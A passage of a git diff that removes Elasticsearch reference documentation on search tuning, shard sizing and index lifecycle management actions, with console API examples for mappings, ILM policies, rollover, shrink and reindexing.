replicas for you is -`max(max_failures, ceil(num_nodes / num_primaries) - 1)`. - -=== Tune your queries with the Profile API - -You can also analyse how expensive each component of your queries and -aggregations are using the {ref}/search-profile.html[Profile API]. This might -allow you to tune your queries to be less expensive, resulting in a positive -performance result and reduced load. Also note that Profile API payloads can be -easily visualised for better readability in the -{kibana-ref}/xpack-profiler.html[Search Profiler], which is a Kibana dev tools -UI available in all X-Pack licenses, including the free X-Pack Basic license. - -Some caveats to the Profile API are that: - - - the Profile API as a debugging tool adds significant overhead to search execution and can also have a very verbose output - - given the added overhead, the resulting took times are not reliable indicators of actual took time, but can be used comparatively between clauses for relative timing differences - - the Profile API is best for exploring possible reasons behind the most costly clauses of a query but isn't intended for accurately measuring absolute timings of each clause - -[[faster-phrase-queries]] -=== Faster phrase queries with `index_phrases` - -The <> field has an <> option that -indexes 2-shingles and is automatically leveraged by query parsers to run phrase -queries that don't have a slop. If your use-case involves running lots of phrase -queries, this can speed up queries significantly. - -[[faster-prefix-queries]] -=== Faster prefix queries with `index_prefixes` - -The <> field has an <> option that -indexes prefixes of all terms and is automatically leveraged by query parsers to -run prefix queries. If your use-case involves running lots of prefix queries, -this can speed up queries significantly. - -[[faster-filtering-with-constant-keyword]] -=== Use `constant_keyword` to speed up filtering - -There is a general rule that the cost of a filter is mostly a function of the -number of matched documents. Imagine that you have an index containing cycles. -There are a large number of bicycles and many searches perform a filter on -`cycle_type: bicycle`. This very common filter is unfortunately also very costly -since it matches most documents. There is a simple way to avoid running this -filter: move bicycles to their own index and filter bicycles by searching this -index instead of adding a filter to the query. - -Unfortunately this can make client-side logic tricky, which is where -`constant_keyword` helps. By mapping `cycle_type` as a `constant_keyword` with -value `bicycle` on the index that contains bicycles, clients can keep running -the exact same queries as they used to run on the monolithic index and -Elasticsearch will do the right thing on the bicycles index by ignoring filters -on `cycle_type` if the value is `bicycle` and returning no hits otherwise. - -Here is what mappings could look like: - -[source,console] --------------------------------------------------- -PUT bicycles -{ - "mappings": { - "properties": { - "cycle_type": { - "type": "constant_keyword", - "value": "bicycle" - }, - "name": { - "type": "text" - } - } - } -} - -PUT other_cycles -{ - "mappings": { - "properties": { - "cycle_type": { - "type": "keyword" - }, - "name": { - "type": "text" - } - } - } -} --------------------------------------------------- - -We are splitting our index in two: one that will contain only bicycles, and -another one that contains other cycles: unicycles, tricycles, etc. Then at -search time, we need to search both indices, but we don't need to modify -queries. - - -[source,console] --------------------------------------------------- -GET bicycles,other_cycles/_search -{ - "query": { - "bool": { - "must": { - "match": { - "description": "dutch" - } - }, - "filter": { - "term": { - "cycle_type": "bicycle" - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -On the `bicycles` index, Elasticsearch will simply ignore the `cycle_type` -filter and rewrite the search request to the one below: - -[source,console] --------------------------------------------------- -GET bicycles,other_cycles/_search -{ - "query": { - "match": { - "description": "dutch" - } - } -} --------------------------------------------------- -// TEST[continued] - -On the `other_cycles` index, Elasticsearch will quickly figure out that -`bicycle` doesn't exist in the terms dictionary of the `cycle_type` field and -return a search response with no hits. - -This is a powerful way of making queries cheaper by putting common values in a -dedicated index. This idea can also be combined across multiple fields: for -instance if you track the color of each cycle and your `bicycles` index ends up -having a majority of black bikes, you could split it into a `bicycles-black` -and a `bicycles-other-colors` indices. - -The `constant_keyword` is not strictly required for this optimization: it is -also possible to update the client-side logic in order to route queries to the -relevant indices based on filters. However `constant_keyword` makes it -transparently and allows to decouple search requests from the index topology in -exchange of very little overhead. diff --git a/docs/reference/how-to/size-your-shards.asciidoc b/docs/reference/how-to/size-your-shards.asciidoc deleted file mode 100644 index 1bc9b050b19..00000000000 --- a/docs/reference/how-to/size-your-shards.asciidoc +++ /dev/null @@ -1,288 +0,0 @@ -[[size-your-shards]] -== How to size your shards -++++ -Size your shards -++++ - -To protect against hardware failure and increase capacity, {es} stores copies of -an index’s data across multiple shards on multiple nodes. The number and size of -these shards can have a significant impact on your cluster's health. One common -problem is _oversharding_, a situation in which a cluster with a large number of -shards becomes unstable. - -[discrete] -[[create-a-sharding-strategy]] -=== Create a sharding strategy - -The best way to prevent oversharding and other shard-related issues -is to create a sharding strategy. A sharding strategy helps you determine and -maintain the optimal number of shards for your cluster while limiting the size -of those shards. - -Unfortunately, there is no one-size-fits-all sharding strategy. A strategy that -works in one environment may not scale in another. A good sharding strategy must -account for your infrastructure, use case, and performance expectations. - -The best way to create a sharding strategy is to benchmark your production data -on production hardware using the same queries and indexing loads you'd see in -production. For our recommended methodology, watch the -https://www.elastic.co/elasticon/conf/2016/sf/quantitative-cluster-sizing[quantitative -cluster sizing video]. As you test different shard configurations, use {kib}'s -{kibana-ref}/elasticsearch-metrics.html[{es} monitoring tools] to track your -cluster's stability and performance. - -The following sections provide some reminders and guidelines you should consider -when designing your sharding strategy. If your cluster has shard-related -problems, see <>. - -[discrete] -[[shard-sizing-considerations]] -=== Sizing considerations - -Keep the following things in mind when building your sharding strategy. - -[discrete] -[[single-thread-per-shard]] -==== Searches run on a single thread per shard - -Most searches hit multiple shards. Each shard runs the search on a single -CPU thread. While a shard can run multiple concurrent searches, searches across a -large number of shards can deplete a node's <>. This can result in low throughput and slow search speeds. - -[discrete] -[[each-shard-has-overhead]] -==== Each shard has overhead - -Every shard uses memory and CPU resources. In most cases, a small -set of large shards uses fewer resources than many small shards. - -Segments play a big role in a shard's resource usage. Most shards contain -several segments, which store its index data. {es} keeps segment metadata in -<> so it can be quickly retrieved for searches. As a -shard grows, its segments are <> into fewer, larger -segments. This decreases the number of segments, which means less metadata is -kept in heap memory. - -[discrete] -[[shard-auto-balance]] -==== {es} automatically balances shards within a data tier - -A cluster's nodes are grouped into <>. Within each tier, -{es} attempts to spread an index's shards across as many nodes as possible. When -you add a new node or a node fails, {es} automatically rebalances the index's -shards across the tier's remaining nodes. - -[discrete] -[[shard-size-best-practices]] -=== Best practices - -Where applicable, use the following best practices as starting points for your -sharding strategy. - -[discrete] -[[delete-indices-not-documents]] -==== Delete indices, not documents - -Deleted documents aren't immediately removed from {es}'s file system. -Instead, {es} marks the document as deleted on each related shard. The marked -document will continue to use resources until it's removed during a periodic -<>. - -When possible, delete entire indices instead. {es} can immediately remove -deleted indices directly from the file system and free up resources. - -[discrete] -[[use-ds-ilm-for-time-series]] -==== Use data streams and {ilm-init} for time series data - -<> let you store time series data across multiple, -time-based backing indices. You can use <> to automatically manage these backing indices. - -[role="screenshot"] -image:images/ilm/index-lifecycle-policies.png[] - -One advantage of this setup is -<>, which creates -a new write index when the current one meets a defined `max_age`, `max_docs`, or -`max_size` threshold. You can use these thresholds to create indices based on -your retention intervals. When an index is no longer needed, you can use -{ilm-init} to automatically delete it and free up resources. - -{ilm-init} also makes it easy to change your sharding strategy over time: - -* *Want to decrease the shard count for new indices?* + -Change the <> setting in the -data stream's <>. - -* *Want larger shards?* + -Increase your {ilm-init} policy's <>. - -* *Need indices that span shorter intervals?* + -Offset the increased shard count by deleting older indices sooner. You can do -this by lowering the `min_age` threshold for your policy's -<>. - -Every new backing index is an opportunity to further tune your strategy. - -[discrete] -[[shard-size-recommendation]] -==== Aim for shard sizes between 10GB and 50GB - -Shards larger than 50GB may make a cluster less likely to recover from failure. -When a node fails, {es} rebalances the node's shards across the data tier's -remaining nodes. Shards larger than 50GB can be harder to move across a network -and may tax node resources. - -[discrete] -[[shard-count-recommendation]] -==== Aim for 20 shards or fewer per GB of heap memory - -The number of shards a node can hold is proportional to the node's -<>. For example, a node with 30GB of heap memory should -have at most 600 shards. The further below this limit you can keep your nodes, -the better. If you find your nodes exceeding more than 20 shards per GB, -consider adding another node. You can use the <> to -check the number of shards per node. - -[source,console] ----- -GET _cat/shards?v=true ----- -// TEST[setup:my_index] - -To use compressed pointers and save memory, we -recommend each node have a maximum heap size of 32GB or 50% of the node's -available memory, whichever is lower. See <>. - - -[discrete] -[[avoid-node-hotspots]] -==== Avoid node hotspots - -If too many shards are allocated to a specific node, the node can become a -hotspot. For example, if a single node contains too many shards for an index -with a high indexing volume, the node is likely to have issues. - -To prevent hotspots, use the -<> index -setting to explicitly limit the number of shards on a single node. You can -configure `index.routing.allocation.total_shards_per_node` using the -<>. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "routing.allocation.total_shards_per_node" : 5 - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -[discrete] -[[fix-an-oversharded-cluster]] -=== Fix an oversharded cluster - -If your cluster is experiencing stability issues due to oversharded indices, -you can use one or more of the following methods to fix them. - -[discrete] -[[reindex-indices-from-shorter-periods-into-longer-periods]] -==== Create time-based indices that cover longer periods - -For time series data, you can create indices that cover longer time intervals. -For example, instead of daily indices, you can create indices on a monthly or -yearly basis. - -If you're using {ilm-init}, you can do this by increasing the `max_age` -threshold for the <>. - -If your retention policy allows it, you can also create larger indices by -omitting a `max_age` threshold and using `max_docs` and/or `max_size` -thresholds instead. - -[discrete] -[[delete-empty-indices]] -==== Delete empty or unneeded indices - -If you're using {ilm-init} and roll over indices based on a `max_age` threshold, -you can inadvertently create indices with no documents. These empty indices -provide no benefit but still consume resources. - -You can find these empty indices using the <>. - -[source,console] ----- -GET /_cat/count/my-index-000001?v=true ----- -// TEST[setup:my_index] - -Once you have a list of empty indices, you can delete them using the -<>. You can also delete any other -unneeded indices. - -[source,console] ----- -DELETE /my-index-* ----- -// TEST[setup:my_index] - -[discrete] -[[force-merge-during-off-peak-hours]] -==== Force merge during off-peak hours - -If you no longer write to an index, you can use the <> to <> smaller segments into larger ones. -This can reduce shard overhead and improve search speeds. However, force merges -are resource-intensive. If possible, run the force merge during off-peak hours. - -[source,console] ----- -POST /my-index-000001/_forcemerge ----- -// TEST[setup:my_index] - -[discrete] -[[shrink-existing-index-to-fewer-shards]] -==== Shrink an existing index to fewer shards - -If you no longer write to an index, you can use the -<> to reduce its shard count. - -[source,console] ----- -POST /my-index-000001/_shrink/my-shrunken-index-000001 ----- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":2,"blocks.write":true}}\n/] - -{ilm-init} also has a <> for indices in the -warm phase. - -[discrete] -[[combine-smaller-indices]] -==== Combine smaller indices - -You can also use the <> to combine indices -with similar mappings into a single large index. For time series data, you could -reindex indices for short time periods into a new index covering a -longer period. For example, you could reindex daily indices from October with a -shared index pattern, such as `my-index-2099.10.11`, into a monthly -`my-index-2099.10` index. After the reindex, delete the smaller indices. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my-index-2099.10.*" - }, - "dest": { - "index": "my-index-2099.10" - } -} ----- diff --git a/docs/reference/ilm/actions/_ilm-action-template.asciidoc b/docs/reference/ilm/actions/_ilm-action-template.asciidoc deleted file mode 100644 index 29ce79ceb49..00000000000 --- a/docs/reference/ilm/actions/_ilm-action-template.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -//// -This is a template for ILM action reference documentation. - -To document a new action, copy this file, remove comments like this, and -replace "sample" with the appropriate action name. - -Ensure the new action docs are linked and included in -docs/reference/ilm/actions.asciidoc -//// - -[role="xpack"] -[[ilm-sample]] -=== Sample - -Phases allowed: hot, warm, cold, delete. - -//// -INTRO -Include a brief, 1-2 sentence description. -//// - -Does a cool thing. - -[[ilm-sample-options]] -==== Options - -//// -Definition list of the options that can be specified for the action: - -If there are no options: - -None. -//// - -`sample_option1`:: -(Optional, integer) -Number of something. - -`sample_option2`:: -(Required, string) -Name of something. - -[[ilm-sample-ex]] -==== Example - -//// -Basic example of configuring the action in an ILM policy. - -Additional examples are optional. -//// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "sample" : { - "sample_option1" : 2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[skip: Replace fake actions and remove this comment.] - -[[ilm-sample2-ex]] -===== Describe example - -The sample action in the following policy does something interesting. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "sample" : { - "sample_option1" : 100, - "sample_option2" : "interesting" - } - } - } - } - } -} --------------------------------------------------- -// TEST[skip: Replace fake actions and remove this comment.] diff --git a/docs/reference/ilm/actions/ilm-allocate.asciidoc b/docs/reference/ilm/actions/ilm-allocate.asciidoc deleted file mode 100644 index 1dd181ebc44..00000000000 --- a/docs/reference/ilm/actions/ilm-allocate.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[role="xpack"] -[[ilm-allocate]] -=== Allocate - -Phases allowed: warm, cold. - -Updates the index settings to change which nodes are allowed to host the index shards -and change the number of replicas. - -The allocate action is not allowed in the hot phase. -The initial allocation for the index must be done manually or via -<>. - -You can configure this action to modify both the allocation rules and number of replicas, -only the allocation rules, or only the number of replicas. -For more information about how {es} uses replicas for scaling, see -<>. See <> for more information about -controlling where {es} allocates shards of a particular index. - - -[[ilm-allocate-options]] -==== Options - -You must specify the number of replicas or at least one -`include`, `exclude`, or `require` option. -An empty allocate action is invalid. - -For more information about using custom attributes for shard allocation, -see <>. - -`number_of_replicas`:: -(Optional, integer) -Number of replicas to assign to the index. - -`include`:: -(Optional, object) -Assigns an index to nodes that have at least _one_ of the specified custom attributes. - -`exclude`:: -(Optional, object) -Assigns an index to nodes that have _none_ of the specified custom attributes. - -`require`:: -(Optional, object) -Assigns an index to nodes that have _all_ of the specified custom attributes. - -[[ilm-allocate-ex]] -==== Example - -The allocate action in the following policy changes the index's number of replicas to `2`. -The index allocation rules are not changed. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "allocate" : { - "number_of_replicas" : 2 - } - } - } - } - } -} --------------------------------------------------- - -[[ilm-allocate-assign-index-attribute-ex]] -===== Assign index to nodes using a custom attribute - -The allocate action in the following policy assigns the index to nodes -that have a `box_type` of _hot_ or _warm_. - -To designate a node's `box_type`, you set a custom attribute in the node configuration. -For example, set `node.attr.box_type: hot` in `elasticsearch.yml`. -For more information, see <>. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "allocate" : { - "include" : { - "box_type": "hot,warm" - } - } - } - } - } - } -} --------------------------------------------------- - -[[ilm-allocate-assign-index-multi-attribute-ex]] -===== Assign index to nodes based on multiple attributes - -The allocate action can also assign indices to nodes based on multiple node -attributes. The following action assigns indices based on the `box_type` and -`storage` node attributes. - -[source,console] ----- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "cold": { - "actions": { - "allocate" : { - "require" : { - "box_type": "cold", - "storage": "high" - } - } - } - } - } - } -} ----- - -[[ilm-allocate-assign-index-node-ex]] -===== Assign index to a specific node and update replica settings - -The allocate action in the following policy updates the index to have one replica per shard -and be allocated to nodes that have a `box_type` of _cold_. - -To designate a node's `box_type`, you set a custom attribute in the node configuration. -For example, set `node.attr.box_type: cold` in `elasticsearch.yml`. -For more information, see <>. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "allocate" : { - "number_of_replicas": 1, - "require" : { - "box_type": "cold" - } - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-delete.asciidoc b/docs/reference/ilm/actions/ilm-delete.asciidoc deleted file mode 100644 index f6e4c6323c9..00000000000 --- a/docs/reference/ilm/actions/ilm-delete.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[role="xpack"] -[[ilm-delete]] -=== Delete - -Phases allowed: delete. - -Permanently removes the index. - -[[ilm-delete-options]] -==== Options - -`delete_searchable_snapshot`:: -beta:[] -(Optional, Boolean) -Deletes the searchable snapshot created in the cold phase. -Defaults to `true`. -This option is applicable when the <> action is used in the cold phase. - -[[ilm-delete-action-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "delete": { - "actions": { - "delete" : { } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-forcemerge.asciidoc b/docs/reference/ilm/actions/ilm-forcemerge.asciidoc deleted file mode 100644 index ceed578c0d8..00000000000 --- a/docs/reference/ilm/actions/ilm-forcemerge.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[[ilm-forcemerge]] -=== Force merge - -Phases allowed: hot, warm. - -<> the index into -the specified maximum number of <>. - -This action makes the index <>. - -To use the `forcemerge` action in the `hot` phase, the `rollover` action *must* be present. -If no rollover action is configured, {ilm-init} will reject the policy. - -[NOTE] -The `forcemerge` action is best effort. It might happen that some of the -shards are relocating, in which case they will not be merged. - -[[ilm-forcemerge-options]] -==== Options - -`max_num_segments`:: -(Required, integer) -Number of segments to merge to. To fully merge the index, set to `1`. - -`index_codec`:: -(Optional, string) -Codec used to compress the document store. The only accepted value is -`best_compression`, which uses {wikipedia}/DEFLATE[DEFLATE] for a higher -compression ratio but slower stored fields performance. To use the default LZ4 -codec, omit this argument. -+ -WARNING: If using `best_compression`, {ilm-init} will <> -and then <> the index prior to the force merge. -While closed, the index will be unavailable for read or write operations. - -[[ilm-forcemerge-action-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "forcemerge" : { - "max_num_segments": 1 - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-freeze.asciidoc b/docs/reference/ilm/actions/ilm-freeze.asciidoc deleted file mode 100644 index abc5b4ce4a6..00000000000 --- a/docs/reference/ilm/actions/ilm-freeze.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[role="xpack"] -[[ilm-freeze]] -=== Freeze - -Phases allowed: cold. - -<> an index to minimize its memory footprint. - -IMPORTANT: Freezing an index closes the index and reopens it within the same API call. -This means that for a short time no primaries are allocated. -The cluster will go red until the primaries are allocated. -This limitation might be removed in the future. - -[[ilm-freeze-options]] -==== Options - -None. - -[[ilm-freeze-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "cold": { - "actions": { - "freeze" : { } - } - } - } - } -} --------------------------------------------------- - diff --git a/docs/reference/ilm/actions/ilm-migrate.asciidoc b/docs/reference/ilm/actions/ilm-migrate.asciidoc deleted file mode 100644 index b829aa68341..00000000000 --- a/docs/reference/ilm/actions/ilm-migrate.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ -[role="xpack"] -[[ilm-migrate]] -=== Migrate - -Phases allowed: warm, cold. - -Moves the index to the <> that corresponds -to the current phase by updating the <> -index setting. -{ilm-init} automatically injects the migrate action in the warm and cold -phases if no allocation options are specified with the <> action. -If you specify an allocate action that only modifies the number of index -replicas, {ilm-init} reduces the number of replicas before migrating the index. -To prevent automatic migration without specifying allocation options, -you can explicitly include the migrate action and set the enabled option to `false`. - -In the warm phase, the `migrate` action sets <> -to `data_warm,data_hot`. This moves the index to nodes in the -<>. If there are no nodes in the warm tier, it falls back to the -<>. - -In the cold phase, the `migrate` action sets -<> -to `data_cold,data_warm,data_hot`. This moves the index to nodes in the -<>. If there are no nodes in the cold tier, it falls back to the -<> tier, or the <> tier if there are no warm nodes available. - -The migrate action is not allowed in the hot phase. -The initial index allocation is performed <>, -and can be configured manually or via <>. - -[[ilm-migrate-options]] -==== Options - -`enabled`:: -(Optional, Boolean) -Controls whether {ilm-init} automatically migrates the index during this phase. -Defaults to `true`. - -[[ilm-enabled-migrate-ex]] -==== Example - -In the following policy, the allocate action is specified to reduce the number of replicas before {ilm-init} migrates the index to warm nodes. - -NOTE: Explicitly specifying the migrate action is not required--{ilm-init} automatically performs the migrate action unless you specify allocation options or disable migration. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "migrate" : { - }, - "allocate": { - "number_of_replicas": 1 - } - } - } - } - } -} --------------------------------------------------- - -[[ilm-disable-migrate-ex]] -==== Disable automatic migration - -The migrate action in the following policy is disabled and -the allocate action assigns the index to nodes that have a -`rack_id` of _one_ or _two_. - -NOTE: Explicitly disabling the migrate action is not required--{ilm-init} does not inject the migrate action if you specify allocation options. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "migrate" : { - "enabled": false - }, - "allocate": { - "include" : { - "rack_id": "one,two" - } - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-readonly.asciidoc b/docs/reference/ilm/actions/ilm-readonly.asciidoc deleted file mode 100644 index fbb51252687..00000000000 --- a/docs/reference/ilm/actions/ilm-readonly.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[role="xpack"] -[[ilm-readonly]] -=== Read only - -Phases allowed: warm. - -Makes the index <>. - -[[ilm-read-only-options]] -==== Options - -None. - -[[ilm-read-only-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "readonly" : { } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-rollover.asciidoc b/docs/reference/ilm/actions/ilm-rollover.asciidoc deleted file mode 100644 index c0d5659ba03..00000000000 --- a/docs/reference/ilm/actions/ilm-rollover.asciidoc +++ /dev/null @@ -1,203 +0,0 @@ -[role="xpack"] -[[ilm-rollover]] -=== Rollover - -Phases allowed: hot. - -Rolls over a target to a new index when the existing index meets one of the rollover conditions. - -IMPORTANT: If the rollover action is used on a <>, -policy execution waits until the leader index rolls over (or is -<>), -then converts the follower index into a regular index with the -<>. - -A rollover target can be a <> or an <>. -When targeting a data stream, the new index becomes the data stream's -<> and its generation is incremented. - -To roll over an <>, the alias and its write index -must meet the following conditions: - -* The index name must match the pattern '^.*-\\d+$', for example (`my-index-000001`). -* The `index.lifecycle.rollover_alias` must be configured as the alias to roll over. -* The index must be the <> for the alias. - -For example, if `my-index-000001` has the alias `my_data`, -the following settings must be configured. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy", - "index.lifecycle.rollover_alias": "my_data" - }, - "aliases": { - "my_data": { - "is_write_index": true - } - } -} --------------------------------------------------- - -[[ilm-rollover-options]] -==== Options - -You must specify at least one rollover condition. -An empty rollover action is invalid. - -`max_age`:: -(Optional, <>) -Triggers roll over after the maximum elapsed time from index creation is reached. -The elapsed time is always calculated since the index creation time, even if the -index origination date is configured to a custom date (via the -<> or -<> settings) - -`max_docs`:: -(Optional, integer) -Triggers roll over after the specified maximum number of documents is reached. -Documents added since the last refresh are not included in the document count. -The document count does *not* include documents in replica shards. - -`max_size`:: -(Optional, <>) -Triggers roll over when the index reaches a certain size. -This is the total size of all primary shards in the index. -Replicas are not counted toward the maximum index size. -+ -TIP: To see the current index size, use the <> API. -The `pri.store.size` value shows the combined size of all primary shards. - -[[ilm-rollover-ex]] -==== Example - -[[ilm-rollover-size-ex]] -===== Roll over based on index size - -This example rolls the index over when it is at least 100 gigabytes. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover" : { - "max_size": "100GB" - } - } - } - } - } -} --------------------------------------------------- - -[ilm-rollover-documents-ex]] -===== Roll over based on document count - -This example rolls the index over when it contains at least one hundred million documents. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover" : { - "max_docs": 100000000 - } - } - } - } - } -} --------------------------------------------------- - -[ilm-rollover-age-ex]] -===== Roll over based on index age - -This example rolls the index over if it was created at least 7 days ago. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover" : { - "max_age": "7d" - } - } - } - } - } -} --------------------------------------------------- - -[ilm-rollover-conditions-ex]] -===== Roll over using multiple conditions - -When you specify multiple rollover conditions, -the index is rolled over when _any_ of the conditions are met. -This example rolls the index over if it is at least 7 days old or at least 100 gigabytes. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover" : { - "max_age": "7d", - "max_size": "100GB" - } - } - } - } - } -} --------------------------------------------------- - -[ilm-rollover-block-ex]] -===== Rollover condition blocks phase transition - -The rollover action only completes if one of its conditions is met. -This means that any subsequent phases are blocked until rollover succeeds. - -For example, the following policy deletes the index one day after it rolls over. -It does not delete the index one day after it was created. - -[source,console] --------------------------------------------------- -PUT /_ilm/policy/rollover_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "50G" - } - } - }, - "delete": { - "min_age": "1d", - "actions": { - "delete": {} - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-searchable-snapshot.asciidoc b/docs/reference/ilm/actions/ilm-searchable-snapshot.asciidoc deleted file mode 100644 index a0ab91229ac..00000000000 --- a/docs/reference/ilm/actions/ilm-searchable-snapshot.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[role="xpack"] -[[ilm-searchable-snapshot]] -=== Searchable snapshot - -beta::[] - -Phases allowed: cold. - -Takes a snapshot of the managed index in the configured repository -and mounts it as a searchable snapshot. -If the managed index is part of a <>, -the mounted index replaces the original index in the data stream. - -[NOTE] -This action cannot be performed on a data stream's write index. Attempts to do -so will fail. To convert the index to a searchable snapshot, first -<> the data stream. This -creates a new write index. Because the index is no longer the stream's write -index, the action can then convert it to a searchable snapshot. -Using a policy that makes use of the <> action -in the hot phase will avoid this situation and the need for a manual rollover for future -managed indices. - -By default, this snapshot is deleted by the <> in the delete phase. -To keep the snapshot, set `delete_searchable_snapshot` to `false` in the delete action. - -[[ilm-searchable-snapshot-options]] -==== Options - -`snapshot_repository`:: -(Required, string) -Specifies where to store the snapshot. -See <> for more information. - -`force_merge_index`:: -(Optional, Boolean) -Force merges the managed index to one segment. -Defaults to `true`. -If the managed index was already force merged using the -<> in a previous action -the `searchable snapshot` action force merge step will be a no-op. - -[NOTE] -The `forcemerge` action is best effort. It might happen that some of -the shards are relocating, in which case they will not be merged. -The `searchable_snapshot` action will continue executing even if not all shards -are force merged. - -[[ilm-searchable-snapshot-ex]] -==== Examples -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "cold": { - "actions": { - "searchable_snapshot" : { - "snapshot_repository" : "backing_repo" - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-set-priority.asciidoc b/docs/reference/ilm/actions/ilm-set-priority.asciidoc deleted file mode 100644 index 7f22bb64bdb..00000000000 --- a/docs/reference/ilm/actions/ilm-set-priority.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[role="xpack"] -[[ilm-set-priority]] -=== Set priority - -Phases allowed: hot, warm, cold. - -Sets the <> of the index as -soon as the policy enters the hot, warm, or cold phase. -Higher priority indices are recovered before indices with lower priorities following a node restart. - -Generally, indexes in the hot phase should have the highest value and -indexes in the cold phase should have the lowest values. -For example: 100 for the hot phase, 50 for the warm phase, and 0 for the cold phase. -Indices that don't set this value have a default priority of 1. - -[[ilm-set-priority-options]] -==== Options - -`priority`:: -(Required, integer) -The priority for the index. -Must be 0 or greater. -Set to `null` to remove the priority. - -[[ilm-set-priority-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "set_priority" : { - "priority": 50 - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-shrink.asciidoc b/docs/reference/ilm/actions/ilm-shrink.asciidoc deleted file mode 100644 index ab5e3fe38cf..00000000000 --- a/docs/reference/ilm/actions/ilm-shrink.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[role="xpack"] -[[ilm-shrink]] -=== Shrink - -Phases allowed: warm - -Sets an index to <> -and shrinks it into a new index with fewer primary shards. -The name of the new index is of the form `shrink-`. -For example, if the name of the source index is _logs_, -the name of the shrunken index is _shrink-logs_. - -The shrink action allocates all primary shards of the index to one node so it -can call the <> to shrink the index. -After shrinking, it swaps aliases that point to the original index to the new shrunken index. - -[IMPORTANT] -If the shrink action is used on a <>, -policy execution waits until the leader index rolls over (or is -<>), -then converts the follower index into a regular index with the -<> action before performing the shrink operation. - -If the managed index is part of a <>, -the shrunken index replaces the original index in the data stream. - -[NOTE] -This action cannot be performed on a data stream's write index. Attempts to do -so will fail. To shrink the index, first -<> the data stream. This -creates a new write index. Because the index is no longer the stream's write -index, the action can resume shrinking it. -Using a policy that makes use of the <> action -in the hot phase will avoid this situation and the need for a manual rollover for future -managed indices. - -[[ilm-shrink-options]] -==== Shrink options -`number_of_shards`:: -(Required, integer) -Number of shards to shrink to. -Must be a factor of the number of shards in the source index. - - -[[ilm-shrink-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "shrink" : { - "number_of_shards": 1 - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-unfollow.asciidoc b/docs/reference/ilm/actions/ilm-unfollow.asciidoc deleted file mode 100644 index 0ad6173f827..00000000000 --- a/docs/reference/ilm/actions/ilm-unfollow.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[role="xpack"] -[[ilm-unfollow]] -=== Unfollow - -Phases allowed: hot, warm, cold. - -Converts a {ref}/ccr-apis.html[{ccr-init}] follower index into a regular index. -This enables the shrink, rollover, and searchable snapshot actions -to be be performed safely on follower indices. -You can also use unfollow directly when moving follower indices through the lifecycle. -Has no effect on indices that are not followers, phase execution just moves to the next action. - -[NOTE] -This action is triggered automatically by the <>, -<>, and -<> actions when they are -applied to follower indices. - -This action waits 